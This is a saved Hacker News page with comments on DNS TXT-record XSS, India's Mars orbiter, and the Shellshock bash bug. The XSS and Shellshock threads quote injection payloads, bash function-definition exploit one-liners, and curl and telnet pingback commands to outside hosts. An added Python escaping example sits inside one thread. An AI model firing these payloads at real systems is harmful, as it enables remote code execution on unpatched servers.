hacker news with inline top comments    .. more ..    26 Sep 2014 Best
TXT Record XSS
992 points by ryanskidmore  7 days ago   228 comments top 47
mrb 7 days ago 12 replies      
I am half serious, but how about making HTML served in TXT records a standard trick for serving small web pages very quickly? There are way fewer network round trips:

  1. DNS query for TXT record for example.com
  2. DNS reply with HTML content
Compared with the traditional 7 steps:

  1. DNS query for A record for example.com
  2. DNS reply with x.x.x.x
  3. TCP SYN to port 80
  4. TCP SYN/ACK
  5. TCP ACK
  6. HTTP GET
  7. HTTP reply with HTML content
It would also make the content super-distributed, super-reliable, as DNS servers cache it worldwide (and for free so it would reduce hosting costs :D). Also TXT records can contain more than 255 bytes as long as they are split on multiple strings of 255 bytes in a DNS reply.

Again, I am only half serious, but this is an interesting thought experiment...

Edit: oddtarball: DNSSEC would solve spoofing. And updates should take no longer than the DNS TTL to propagate: the TTL is under your control; you could set it to 60 seconds if you wanted. It is a common, false misconception that many DNS resolvers ignore the TTL. Some large web provider (was it Amazon? I forget) ran an experiment and demonstrated that across tens or hundreds of thousands of clients worldwide, 99% of them saw DNS updates propagated within X seconds if the TTL was set to X seconds. Only <1% of DNS resolvers were ignoring it.

ryan-c 7 days ago 4 replies      
I enumerated all IPv4 PTR records a few years back, and I saw a couple XSS things there as well. If anyone wants to host that data set somewhere, let me know, would be interesting to see what others do with it.

Edit: I found my data and have a grep running on it, will share what turns up.

Edit2: Somewhat less exciting than I remember:

$ fgrep -- '>' *
philip1209 7 days ago 4 replies      
I added FartScroll.js from the Onion to my text records:

SEJeff 7 days ago 1 reply      
From any Linux (or probably OS X) workstation / server, you can run the command "host -t TXT jamiehankins.co.uk", i.e.:

$ host -t TXT jamiehankins.co.uk

;; Truncated, retrying in TCP mode.

jamiehankins.co.uk descriptive text "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>"

jamiehankins.co.uk descriptive text "v=spf1 include:spf.mandrillapp.com ?all"

jamiehankins.co.uk descriptive text "<script src='//peniscorp.com/topkek.js'></script>"

jamiehankins.co.uk descriptive text "google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI"

kehrlann 7 days ago 4 replies      
This is hilarious, but could this potentially be a real threat to anything?
ryanskidmore 6 days ago 1 reply      
Who.is have fixed it now, but you can still see it in action over at archive.org

AsakiIssa 7 days ago 2 replies      
Wasn't expecting that at all! Had several tabs opened and was really confused for a few seconds while I tried to find the tab with 'youtube on autoplay'.

Firefox needs to show the 'play' icon for the audio tag.

garazy 7 days ago 0 replies      
I've found about 80 TXT records with <script tags in them - most of them look like the person not understanding where to paste a JavaScript snippet over XSS attempts, here's all of them -

There's a few that are "13h.be/x.js" that look like someone trying this out before.

jedberg 7 days ago 1 reply      
Come on people, this is so basic. If you didn't generate the data, don't display it on your web page without filtering it. It blows my mind that this isn't just everyone's default.
rbinv 7 days ago 3 replies      
Clever. I didn't get it at first.

Never trust user input.

Edit: See http://www.dnswatch.info/dns/dnslookup?la=en&host=jamiehanki... for the actual code.

colinbartlett 7 days ago 0 replies      
Bravo, I just embarrassed myself in a very quiet meeting.
toddgardner 7 days ago 0 replies      
The most clever exploit of XSS I've ever seen. Beautiful. Bravo.
JamieH 6 days ago 0 replies      
Still working here if anyone is yet to see it.

Cance 18 hours ago 0 replies      
For more information, visit this site >>>>>>> http://getformulat10.com/
Sanddancer 7 days ago 0 replies      
Given how many whois sites cache results, I wonder how many of them are also vulnerable to SQL injections...
kazinator 7 days ago 1 reply      
Since there is very little discussion in the link, pardon me for stating what may be obvious to some, but not necessarily everyone.

The point here is that:

1. DNS TXT records can contain HTML, including scripts and whatever.

2. Domain registrants can publish arbitrary TXT records.

3. TXT records can appear in pages generated by web sites which serve, for instance, as portals for viewing domain registration information, including DNS records such as TXT records.

4. Thus, such sites are vulnerable to perpetrating cross-site-script attacks (XSS) on their visitors if they naively paste the TXT record contents into the surrounding HTML.

5. The victim is the user who executes a query which finds the malicious domain which serves up the malicious TXT record that is interpolated into the displayed results. The user's browser executes the malicious code.

Thus, when you are generating UI markup from pieces, do not trust any data that is pulled from any third-party untrusted sources, including seemingly harmless TXT records.
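An added example (not code from this thread or from who.is) showing both halves of points 1 to 5 above: parsing TXT RDATA, including the 255-byte string split mrb mentions further up, and then rendering the records with and without escaping. The iframe and SPF values are constructed from the records quoted in this thread.

```python
import html
import re

# Constructed sample values, copied from the TXT records quoted in this thread.
IFRAME = ("<iframe width='420' height='315' "
          "src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' "
          "frameborder='0' allowfullscreen></iframe>")
SPF = "v=spf1 include:spf.mandrillapp.com ?all"


def encode_txt_rdata(value: str) -> bytes:
    """Encode one TXT value as DNS character-strings: <length byte><up to 255 bytes>,
    repeated. This is how values longer than 255 bytes travel in a DNS reply."""
    data = value.encode("utf-8")
    out = bytearray()
    for i in range(0, len(data), 255):
        chunk = data[i:i + 255]
        out.append(len(chunk))
        out += chunk
    return bytes(out)


def decode_txt_rdata(rdata: bytes) -> str:
    """Join the character-strings back into one value, refusing a bad length
    prefix instead of silently returning a partial record."""
    parts = []
    pos = 0
    while pos < len(rdata):
        length = rdata[pos]
        pos += 1
        chunk = rdata[pos:pos + length]
        if len(chunk) != length:
            raise ValueError("truncated character-string in TXT RDATA")
        parts.append(chunk.decode("utf-8", errors="replace"))
        pos += length
    return "".join(parts)


def render_unsafe(domain: str, records) -> str:
    """The bug described above: record text interpolated straight into the page,
    so a registrant-controlled <script> or <iframe> runs in the visitor's browser."""
    rows = "".join(f"<tr><td>TXT</td><td>{r}</td></tr>" for r in records)
    return f"<h1>{domain}</h1><table>{rows}</table>"


def render_safe(domain: str, records) -> str:
    """Same page with every third-party string escaped. Escaping is context
    specific: html.escape covers element text and quoted attribute values, not
    URL, CSS or JavaScript contexts, which need their own encoders."""
    rows = "".join(
        f"<tr><td>TXT</td><td>{html.escape(r, quote=True)}</td></tr>" for r in records
    )
    return f"<h1>{html.escape(domain, quote=True)}</h1><table>{rows}</table>"


ACTIVE_TAG = re.compile(r"<(script|iframe|img|svg|object|embed)\b", re.IGNORECASE)


def contains_active_markup(fragment: str) -> bool:
    """Output check: did any tag we did not write ourselves survive into the page?"""
    return ACTIVE_TAG.search(fragment) is not None


if __name__ == "__main__":
    wire = encode_txt_rdata(IFRAME)
    records = [decode_txt_rdata(wire), SPF]
    print("unsafe page has active markup:",
          contains_active_markup(render_unsafe("example.com", records)))
    print("safe page has active markup:  ",
          contains_active_markup(render_safe("example.com", records)))
```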

mike-cardwell 7 days ago 0 replies      
A while ago I experimented with adding stuff to the version.bind field in bind. Just updated it:

mike@glue:~$ dig +short chaos txt version.bind @

"<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1' frameborder='0' allowfullscreen></iframe>"

I put this in my named.conf:

version "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1' frameborder='0' allowfullscreen></iframe>";

This site is vulnerable:

Although takes a minute before it kicks in. I did report it to them at the time, but never got a response.

elwell 7 days ago 1 reply      
In playing around with this hack, I discovered that Dreamhost doesn't properly escape TXT records in their admin interface when modifying DNS records. I put an iframe in and it shows the box but the src is removed; it also killed the page at that point so I'm unable to remove it...
bwy 7 days ago 3 replies      
Wish there was a warning, because I accidentally clicked this link in class just now.
0x0 7 days ago 0 replies      
Can it be done with CNAME and SRV records too?
Thaxll 7 days ago 2 replies      
It has nothing to do with TXT records; it's just the website that renders HTML. It could be any source.
gsharma 7 days ago 0 replies      
Not sure how Trulia handles input for its usernames, but at one point I was able to do this http://www.trulia.com/profile/-iframe--home-buyer-loleta-ca-...
js2 7 days ago 0 replies      
All editors should, upon save, put up the following prompt:

"I acknowledge the code just written does not trust its input, under penalty of being whipped by a wet noodle."

But I guess folks would just click through.

sidcool 6 days ago 1 reply      
I opened this link on my Android's Chrome browser. The top search text input started wildly convulsing. First I thought the post was about that. But I didn't really get what this is about.
sanqui 7 days ago 1 reply      
Looks like the who.is site has patched the exploit up a few minutes ago.
gcr 7 days ago 0 replies      
Warning: this page links to (loud!) automatic playing audio.
tekknolagi 7 days ago 0 replies      
This is hysterical.
homakov 6 days ago 0 replies      
XSS on a shitty website not doing trivial sanitization gets 900 points on HN, oh guys you are disappointing me so much.
indielol 7 days ago 0 replies      
Wouldn't this make it super easy for Google to ban (show the security warnings in Chrome) the domains?
nerdy 7 days ago 0 replies      
Best POC ever.
_RPM 7 days ago 1 reply      
When I went to the page, it started playing music. I find that very frustrating and annoying.
bdpuk 7 days ago 0 replies      
I've seen similar examples with HTTP headers and sites that display those, nice angle.
general_failure 7 days ago 0 replies      
Well played sir, very well played
thomasfl 7 days ago 0 replies      
Finally somebody found a way to put html injection on to good use.
wqfeng 7 days ago 1 reply      
Could anyone tell me what's about? I just see a DNS page.
ginvok 7 days ago 0 replies      
Aaaand now I'm deaf :) Gotta learn sign language
tedchs 6 days ago 0 replies      
FYI it looks like who.is fixed the XSS bug.
iamwil 7 days ago 3 replies      
How does this work?
ing33k 7 days ago 0 replies      
good hack but really stupid of me to click it directly :\
PaulSec 7 days ago 0 replies      
I wonder how this got so many points.. Reflected XSS in 2014, yeah..
himanshuy 7 days ago 1 reply      
What's up with the search box?
zobzu 7 days ago 0 replies      
That made me laugh, good one :)
notastartup 7 days ago 0 replies      
man...I woke up and got a dose of surprise....love this song.
r0m4n0 7 days ago 3 replies      
isn't this technically illegal to demonstrate haha?
st3fan 7 days ago 0 replies      
sprkyco 7 days ago 0 replies      
Luckily it does not work on my normal browser: https://www.whitehatsec.com/aviator/
ISRO Mars Orbiter Mission: Spacecraft successfully enters Martian Orbit
1009 points by skbohra123  1 day ago   153 comments top 44
noisy_boy 1 day ago 5 replies      
People who keep making the (nonsense) point of space vs. better roads keep harping on how the money will be better spent on infrastructure.

I looked up the Indian planning commission's budget for 2013-14 road development. Planning Commission provided an annual outlay of Rs.37,300.00 Crore for 2013-2014 for development in road sector[1]. That is more than 6 billion USD - just for improving roads, for a year.

The budget of the Mars Orbiter mission was around 75 million USD[2] i.e. less than 1.5% of [1].

[1]: http://www.performance.gov.in/sites/default/files/department...

[2]: http://www.forbes.com/sites/saritharai/2013/11/07/how-indias...

sidcool 1 day ago 6 replies      
I remember when in 2012, the then PM of India had declared this project. The entire internet community came together to deride this, saying it's not possible in a couple of years and that India had better feed its hungry etc.

I am a very proud Indian today. This achievement, like other by humanity (LHC in particular), will encourage me to push myself towards greatness.

suprgeek 1 day ago 4 replies      
What is even more commendable is that it was done pretty cheaply [1]. Granted the capabilities of some of the other craft are different - but not THAT different. Add to this the fact that this was a success in the first shot - getting a craft from the Earth to Mars orbit correctly in one shot on a meager budget is indeed a stunning success for ISRO.

[1] https://twitter.com/WSJIndia/status/514591179363864578/photo...

swatkat 1 day ago 2 replies      
MOM spacecraft was launched last year (5th Nov 2013) and today it entered into Martian orbit. Here's the twitter handle of spacecraft: https://twitter.com/MarsOrbiter

Mars Orbit Insertion was covered live on ISRO webcast (http://webcast.isro.gov.in/), Doordarshan National TV and other channels. Here's the complete coverage of MOI: https://www.youtube.com/watch?v=VZL_Vwy0JqI

MOI sequence of events: http://spaceflightnow.com/mars/mom/status.html

MOM carries five scientific payloads: http://www.isro.org/mars/payload.aspx

Expecting first set of colour pictures from MOM by today evening (IST) :)

realrocker 1 day ago 2 replies      
Not only did Mom reach Mars, she also got a pretty good bargain on it. So Indian :)
SoulMan 1 day ago 3 replies      
Given that HN is a more intellectual and educated group, there is no one here criticizing the money spent. But there were skeptics who did criticize initially. It basically represents the sample of the population who probably never understood the meaning of space exploration. Most of them are partially educated or educated with a faulty system. It does not just apply to India; there are people sitting in the US Congress who think NASA is a waste of money. The same people would have blamed ISRO for INSAT, GSLV & PSLV back in the days when there were a bunch of satellites already doing similar work. It's only because of those ISRO efforts that today we have our own geo-sensing and satellite communication without having to buy from external agencies or compromise our security.
pdevr 1 day ago 1 reply      
Twitter handle of ISRO's Mars Orbiter: https://twitter.com/MarsOrbiter

First tweet:"What is red, is a planet and is the focus of my orbit?"

corford 1 day ago 0 replies      
Successful Mars orbit for 0.42% of the price Facebook paid for Whatsapp.

Awesome job and glad ISRO doesn't seem to suffer from the same bad luck the Russians do when it comes to Mars!

gordon_freeman 1 day ago 1 reply      
Great news for India's space program especially considering INR4.54 billion (US$74 million) cost for an interplanetary mission like this, it should be a crash course in frugal space engineering. I really believe ISRO can form a close partnership with NASA in future to launch supply to ISS and much more.
vs4vijay 1 day ago 2 replies      
Hollywood movie Gravity costs more than this space mission.
zkirill 1 day ago 2 replies      
It is so incredibly inspiring to listen to a PM speak about space, science, research and exploration for more than an hour. Does anyone know if this is broadcast on Indian national TV?
roywiggins 1 day ago 0 replies      
This is massively inspiring. Huge PR boon for India, and they obviously deserve it.

Super happy about this. Welcome to the interplanetary club!

nitin_flanker 1 day ago 2 replies      
I really want people around the world to stop saying that this is a cheap mission. Instead you can say that this is an economical mission.

Calling it cheap is a derogatory remark. ISRO was thrifty while spending funds on this mission.

andystannard 11 hours ago 0 replies      
Amazing, well done! Sounds like they chose the scope of the mission very wisely and came up with a useful goal that they could achieve with the limited resources. Let's hope they get some useful data from the methane detector.
prithvitheprime 1 day ago 0 replies      
It was the lowest-priced spacecraft ever sent to Mars; congrats India (big move on creating low-priced space shuttles)
r0muald 1 day ago 0 replies      
I didn't see anyone compare this success at first attempt with the (partial) failure of Jade Rabbit https://news.ycombinator.com/item?id=7226307 however that seems a more interesting comparison between newcomers to space exploration rather than, say, NASA missions.
bharath28 1 day ago 0 replies      
Respect. For sheer aplomb & perseverance. It is moments like these that make me want to put my head down and march on no matter what.
kjs3 1 day ago 0 replies      
Congrats, India. Welcome to the club. Hopefully you'll have many more successes.
girvo 1 day ago 0 replies      
What an amazing achievement! And what a retro looking website! Congrats to the team, this is something to be proud of.
alphakappa 1 day ago 0 replies      
The odds were against them, and yet they managed to pull this off on the first try. Congratulations ISRO! http://www.bbc.com/news/world-asia-india-29307123
chdir 1 day ago 0 replies      
Previous discussion on the budget : https://news.ycombinator.com/item?id=7964261
vivekchand19 8 hours ago 0 replies      
Congrats ISRO :)
nmridul 1 day ago 0 replies      
Title should be "India's mars orbiter ..... "
return0 1 day ago 0 replies      
I'm surprised it's not discussed here ... but the ones who should be worried here is SpaceX, not NASA.
skbohra123 1 day ago 0 replies      
Webcast of the event can be seen here http://webcast.isro.gov.in/
lmm 1 day ago 0 replies      
Does anyone maintain an up-to-date version of the Mars Scorecard? What's Earth's average for this decade?
mukundmr 1 day ago 0 replies      
I hope events like this will help rekindle the interest in science and that ISRO gets a budget boost.
murukesh_s 1 day ago 1 reply      
NASA - Do you want to Outsource? ;-)
jamesmalvi 1 day ago 0 replies      
Proud to be indian.. Well Done India... I hope we get the best out of this trip
gude 1 day ago 0 replies      
That's one giant interplanetary leap for India
bane 1 day ago 0 replies      
Absolutely amazing, congratulations India!
pranayairan 1 day ago 0 replies      
Awesome achievement, go go go.
kamakazizuru 1 day ago 0 replies      
cue haters talking about lack of toilets/education/too much rape/other random social issue that exists in India they heard about that one time in the news - and how India should fix that instead of developing technology...in 5..4..3..2..1
shashikant52004 1 day ago 0 replies      
Congrats team india!!!
gauthamilango 1 day ago 0 replies      
Congrats ISRO!!!!!
jpatel3 1 day ago 0 replies      
Its a proud moment!
nagarch 1 day ago 0 replies      
Simply Amazing...
arc_of_descent 1 day ago 0 replies      
digifire 1 day ago 0 replies      
I just wish ISRO was privately held like SpaceX and giving it a run for its money. You would get the students in India really inspired to learn real engineering.
general_failure 1 day ago 0 replies      
Congrats India!

In other news, http://isro.gov.in/ has a <blink> tag :) Some parts of ISRO aren't catching up with technology :))

jacko0 1 day ago 2 replies      
Well Done! But $74 Million could have been spent giving toilets to Indians, so they don't have to shit in the streets.
seesomesense 1 day ago 0 replies      
Good practice for ICBM development.

India's current IRBMs can target all of China. The goal is to be able to target all of the mainland United States.

CVE-2014-6271: Remote code execution through bash
888 points by vault_  1 day ago   392 comments top 63
daveloyall 1 day ago 1 reply      
There's some misunderstanding of how the one-liner works, so here's a writeup.

You can break the one-liner into two lines to see what is happening.

    1. hobbes@media:~$ export badvar='() { :;}; echo vulnerable'
    2. hobbes@media:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
    3. bash: warning: badvar: ignoring function definition attempt
    4. bash: error importing function definition for `badvar'
    5. I am an innocent sub process in 4.3.25(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash spots the specially formed variable (named badvar), prints a warning,

4. ...and apparently doesn't define the function at all?

5. But other than that, the child bash runs as expected.

And now the same two input lines on an OLD bash:

    1. hobbes@metal:~$ export badvar='() { :;}; echo vulnerable'
    2. hobbes@metal:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
    3. vulnerable
    4. I am an innocent sub process in 4.3.22(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash accidentally EXECUTES a snippet that was inside the variable named 'badvar'?!

4. But other than that, the child bash runs as expected. Wow, I should update that machine. :)

jimrandomh 1 day ago 3 replies      
If you are responsible for the security of any system, this is your immediate, drop-everything priority. The technical details of the exploit mean that new ways of exploiting it will be discovered soon. Precedent suggests that automated systematic attacks against every server on the Internet will be coming, on a time scale of hours.
andrew13 1 day ago 5 replies      
It might still be an issue. The patches may not have done enough.

$ env X='() { (a)=>\' sh -c "echo date"; cat echo

env X='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :("

cft 1 day ago 4 replies      
Here's how to patch Ubuntu 8.04 or anything where you have to build bash from source:

  # assume that your sources are in /src
  cd /src
  wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
  # download all patches (GNU numbers them from 001, so start at 1, not 0)
  for i in $(seq -f "%03g" 1 25); do wget http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done
  tar zxvf bash-4.3.tar.gz
  cd bash-4.3
  # apply all patches, in order
  for i in $(seq -f "%03g" 1 25); do patch -p0 < ../bash43-$i; done
  # build and install (installs under /usr/local by default; the install step needs root)
  ./configure && make && make install
Not sure if Ubuntu 8.04 with custom built bash will be upgradable to 10.04??

masterleep 1 day ago 2 replies      
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

From https://securityblog.redhat.com/2014/09/24/bash-specially-cr...

JoshTriplett 1 day ago 3 replies      
Is it just me, or are the patches "fixing" the vulnerability woefully insufficient? With the patch, bash stops executing the trailing code, but it still allows defining arbitrary shell functions from environment variables. So, even though the patch fixes the ability to exploit this via SSH_ORIGINAL_COMMAND or HTTP_*, anything that can set environment variables can still override an arbitrary command. (Note that privileged environments typically filter out attempts to set PATH, LD_LIBRARY_PATH, and so on.)

This applies even if your shell script or shell snippet uses the full paths to commands. For instance:

    $ env '/sbin/foo'='() { echo exploit; }' bash -c '/sbin/foo'
    exploit

antocv 1 day ago 2 replies      
Funny, this works even after bash fix / upgrade

env X='() { (a)=>\' sh -c "echo date"; cat e

From http://seclists.org/oss-sec/2014/q3/672

userbinator 1 day ago 1 reply      
According to http://wiki.bash-hackers.org/syntax/basicgrammar it appears that this is because bash allows functions to be exported through environment variables into subprocesses, but the code to parse those function definitions seems to be the same used to parse regular commands (and thus execute them).

Edit: after a brief glance over the affected code, this might not be so easy to patch completely - the actual method where everything interesting starts to take place is initialize_shell_variables in variables.c and parse_and_execute() in builtins/evalstring.c, so parsing and execution happen together; this is necessary to implement the shell grammar and is part of what makes it so powerful, but it can also be a source of vulnerabilities if it's not used carefully. I suppose one attempt at fixing this could be to separate out the function parsing code into its own function, one which can't ever cause execution of its input, and use that to parse function definitions in environment variables. This would be a pretty easy and elegant thing to do with a recursive-descent parser, but bash uses a lex/yacc-generated one to consume an entire command at once...

However, all in all I'm not so sure this ability to export funcdefs is such a good idea - forking a subshell automatically inherits the functions in the parent, and if it's a shell that wasn't created in such a manner, if it needs function definitions it can read them itself from some other source. This "feature" also means environment variables cannot start with the string '() {' (and exactly the string '() {' - even removing the space between those characters, e.g. '(){', doesn't trigger it) without causing an error in any subprocess - violating the usual assumption that environment variables can hold any arbitrary string. It might be a rare case, but it's certainly a cause for surprise.

agwa 1 day ago 4 replies      
It is a very good thing that Debian and Ubuntu use /bin/dash for /bin/sh by default, since /bin/sh is implicitly invoked all over the place (e.g. by system(3)). Distros which use /bin/bash for /bin/sh are gonna have a bad time.

Edit: not implying that Debian and Ubuntu aren't affected too, just that the impact there will be lessened.

jingo 22 hours ago 0 replies      
A quick fix would be to stop using bash.

I write hundreds of shell scripts per year and I never, ever use bash. Everything can be done with a less complex /bin/sh having only POSIX-like features.

There's no reason webservers have to use bash by default.

Sysadmins might need a hefty shell with lots of features in order to do their work, but an httpd should not need access to bash-isms. It should work fine with a very minimal POSIX-like shell.

I'm glad the systems I use do not have bash installed by default. The only time I ever use it is when a software author tries to force me to use bash by writing their install scripts in it and using bash-isms so the script will not run with a simpler shell like a BSD /bin/sh.

khaki54 1 day ago 1 reply      
So I took a great unix/linux systems programming class, http://sites.fas.harvard.edu/~lib215/ where you learn about all of the system software that you take for granted. Among other things, we had to write our own shell. There is an awful lot to consider, and most of it you are just trying to get to work properly. With regard to security, you feel like you are protected for the most part because the shell resides in userland and it's basically understood that you shouldn't trust foreign shell scripts.

Is the worry here that the code gets executed by the kernel or superuser, enabling privilege escalation? Otherwise it wouldn't be a big deal that extra code is executed by a function declaration.

Eclyps 1 day ago 3 replies      
Amazon's Linux distro for EC2 is still waiting for a patch.

EDIT: Finally got things updated. Bulletin can be found here: https://alas.aws.amazon.com/ALAS-2014-418.html

If yum isn't finding the update, try running "yum clean all" and then "yum update bash"

_wmd 1 day ago 1 reply      
As an example of who might be impacted, since openssh preserves the original command line passed to the ssh server when authenticating a public key that has a fixed command associated in authorized_keys, GitHub and BitBucket security teams are probably both having a really exciting day.
flebron 1 day ago 2 replies      
Maybe I'm doing something wrong, but I just tested it in ZSH (5.0.5, Linux) and the same vulnerable behavior seems to show up.
Zweihander 1 day ago 1 reply      
why-el 1 day ago 1 reply      
Is someone from Heroku online here right now? My apps are all affected and since I am trusting Heroku with this, I am hoping they patch the system as soon as possible.
h43k3r 1 day ago 1 reply      
I tested some of the sites and successfully executed some test code. One can easily google for such sites. The important thing is that, the link using which I ran the code is of a .gov site.

This thing seriously needs to be patched asap. Update your systems now.

m4r71n 1 day ago 0 replies      
Some more information was just posted to oss-sec:

Oculus 1 day ago 4 replies      
Have big security vulnerabilities been cropping up more often recently or does it seem that way because I've started to pay attention?
MBlume 1 day ago 3 replies      
I'm a bit confused about how to properly patch my mac.

Homebrew installs upgraded bash to /usr/local/bin/bash, everyone says what I should do is run 'chsh -s /usr/local/bin/bash' but if I have a script that has a /bin/bash hashbang at the top, won't it still use the vulnerable bash install?

I mean I guess the answer is "you're probably not hosting a publicly accessible service on your mac, who cares?", which is true in my case, but still.

ecze 1 day ago 2 replies      
With this bug, bash access to CiscoCallmanager is possible... Tested and working....
AnimalMuppet 1 day ago 1 reply      
Off topic:

This is why I keep coming back to HN. I've gotten an amazing amount of useful info on this very quickly. Great discussion - no trolling, no BS, just serious questions and serious answers.

0x0 1 day ago 2 replies      
The currently published fix is claimed to be incomplete: https://twitter.com/taviso/status/514887394294652929
BenjaminCoe 1 day ago 1 reply      
Wanted to share the simple Ansible script we used to patch CVE-2014-6271 at npm: https://github.com/npm/ansible-bashpocalypse
gwillem 1 day ago 3 replies      
This is quite stealthy way to scan, as Accept headers are generally not logged:

    curl -H 'Accept: () { :;}; /usr/bin/curl -so /dev/null http://my.pingback.com' 
Found nothing so far though. IMHO the number of Bash CGI scripts in the wild must be pretty low.

iuguy 1 day ago 3 replies      
My OSX Mavericks install appears to be affected:

  foom:~ steve$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
  vulnerable
  this is a test

AntiRush 1 day ago 1 reply      
It seems like the current patch might not be a complete fix:

throwaway49152 1 day ago 2 replies      
What would be the best way to go if using Debian 5 (lenny)?

The only service exposed is ssh, and no one outside the company has an account. Is it still vulnerable through ssh?

detectify 13 hours ago 0 replies      
We just released a complete quick-test for #shellshock here: https://shellshock.detectify.com/. It's free to use and here's the information about how the scanner works: goo.gl/8vp6eo

Please feedback here: https://news.ycombinator.com/item?id=8366643

deathanatos 21 hours ago 0 replies      
From just a functionality standpoint, how is even the patched version supposed to work? It seems to undefine the variable:

  % E='() { echo hi; }; echo cry' bash -c 'echo "-$E-"'
  bash: warning: E: ignoring function definition attempt
  bash: error importing function definition for `E'
  --
Since everyone's favorite example seems to be CGI scripts, doesn't this result in the script having no variable, as opposed to just a text one? Suddenly the script can break because an expected variable is no longer present simply because the input had a certain odd looking form?

In fact, if I wanted my variable to be a function, why wouldn't I just explicitly eval it? What's the use case at all for this functionality?

milankragujevic 10 hours ago 0 replies      
Here's an easy to use and reliable scanner to test if your website is vulnerable. http://milankragujevic.com/projects/shellshock/
ilconsigliere 1 day ago 2 replies      
Am I wrong in thinking that this seems a bit worse than Heartbleed?
sauere 1 day ago 1 reply      
No update out for Ubuntu Server 14.04 yet.

/edit: the Red Hat blog has a good overview https://securityblog.redhat.com/2014/09/24/bash-specially-cr...

jtchang 1 day ago 0 replies      
For this to happen the attacker has to control environment variables and then a bash shell is spawned.

Lots of web stuff spawn shells setting environment variables to stuff in HTTP headers. LC_TIME with some time zone settings might be one.

detectify 1 day ago 0 replies      
We have added the CVE to our scanning routines and the update is now online on www.detectify.com. Test your environment for unpatched servers. In times like these it's OK to go for our free plan.
saurabhnanda 1 day ago 0 replies      
Am I vulnerable if using the Paperclip gem to manage file uploads on a Rails app (it internally fires up 'convert' to generate thumbnails, I believe).

What if there is an haproxy sitting in front of the Rails app?

SchizoDuckie 1 day ago 0 replies      
I'm by no means an expert, but am I completely wrong if I think something like this should work on an exploitable system to get a pingback from a vulnerable system without curl ?

  curl -A "() { :; }; echo GET /pingback.php | telnet bashexploitindexer.fake 80" http://expoitablehost.com/blah.cgi

jdimov 1 day ago 1 reply      
All the explanations of why this is bad seem to involve CGI. Didn't the CGI interface die in the 90's? Who uses that nowadays?
korzun 1 day ago 2 replies      
FreeBSD appears to be affected.
kacy 1 day ago 0 replies      
Ubuntu has been patched, it appears. If you're on Ubuntu, try this:

sudo apt-get update

sudo apt-get --only-upgrade install bash

rurban 23 hours ago 0 replies      
What I'm really worried about now is every single cable modem and router out there, as they are very rarely updated. They run their shit for years. The bigger routers yes, but smaller ones and the modems not.
piratebroadcast 1 day ago 0 replies      
My friend tried it on Heroku - It is affected.
wyager 1 day ago 0 replies      
This is what happens when you have two different processes doing IPC using a human interface mechanism.

Another huge family of vulnerabilities that exists for the same reason are SQL injection vulnerabilities. SQL was invented as a way for humans at a terminal to do database operations. However, we started using it as a way of doing IPC. The problem with using human interfaces as an IPC mechanism is that human interfaces are rarely well-defined or minimal, so it is very hard to constrain behavior to what you expect.

The way to fix all of these bugs is to use well-defined, computer-oriented IPC mechanisms where there is a clear distinction between code and data. For example, database queries might be constructed by function call instead of string manipulation, which could pack them into a safe TLV format with no chance of malicious query injection. Generating web server content from a different language could be done via a proper FFI or message passing mechanism, rather than CGI scripts.

Sanddancer 1 day ago 3 replies      
Can someone with mod_security test a regex I wrote that should mitigate this? /\(.?\)\s\{.?\}\s\;/ from testing seems to catch any variants that I can think of that can trigger this bug, but I don't have a machine easily available to me at the moment to test with, unfortunately.
vhost- 1 day ago 0 replies      
For those of us with large clusters and chef, here is a useful knife command for updating bash on debian/ubuntu systems:

knife ssh 'name:*' 'sudo apt-get update && sudo apt-get install -y --only-upgrade bash'

kazinator 1 day ago 0 replies      
Passing executable code in environment variables is an incredibly bad idea.

The parsing bug is a red herring; there are probably ways to exploit the feature even when it doesn't have the bug.

The parsing bug means that the mere act of defining the function in the child bash will execute the attacker's code stored in the environment variable.

But if this problem is closed, the issue remains that the attacker controls the environment variable; the malicious code can be put inside the function body. Even though it will not then be executed at definition time, perhaps some child or grand-child bash can be nevertheless goaded into calling the malicious function.

Basically this is a misfeature that must be rooted out, pardon the pun.

ck2 1 day ago 1 reply      

Another attack surface is OpenSSH through the use of AcceptEnv variables, as well as through TERM and SSH_ORIGINAL_COMMAND. An environment variable with an arbitrary name can carry a nefarious function which can enable network exploitation.

mirashii 1 day ago 0 replies      
At a glance, one interesting use of this is a potential local privilege escalation on systems with a sudoers file which restricts commands which can be run to ones that include a bash script, and allows you to keep some environment variables.
super_mario 1 day ago 4 replies      
Interestingly enough ancient BASH version 3.2 on Mac OS X 10.9.5 is not vulnerable:

    $ echo $BASH_VERSION
    3.2.51(1)-release
    $ x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test
    $
I manually patched my BASH 4.3 to patch level 25 so it's not vulnerable either.

    $ echo $BASH_VERSION
    4.3.25(1)-release
    $ x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test
    $

kalops 1 day ago 4 replies      
so basically turn off AcceptEnv in sshd_config?
snissn 1 day ago 0 replies      
Here is a very simple proof of concept that helped me understand the vulnerability:

  bash-3.2$ anyvariable='() { true; }; echo foo' bash
  foo

sauere 1 day ago 0 replies      
Also: I was not able to test it yet since I am still on the road, but I believe the Cisco AnyConnect VPN client OS-detection is affected
jacksoncage 1 day ago 0 replies      
Saved a lot of time again today with salt!

    $ salt '*' pkg.install bash refresh=True

and then check for the right version:

    $ salt '*' pkg.version bash
jamiepenney 1 day ago 0 replies      
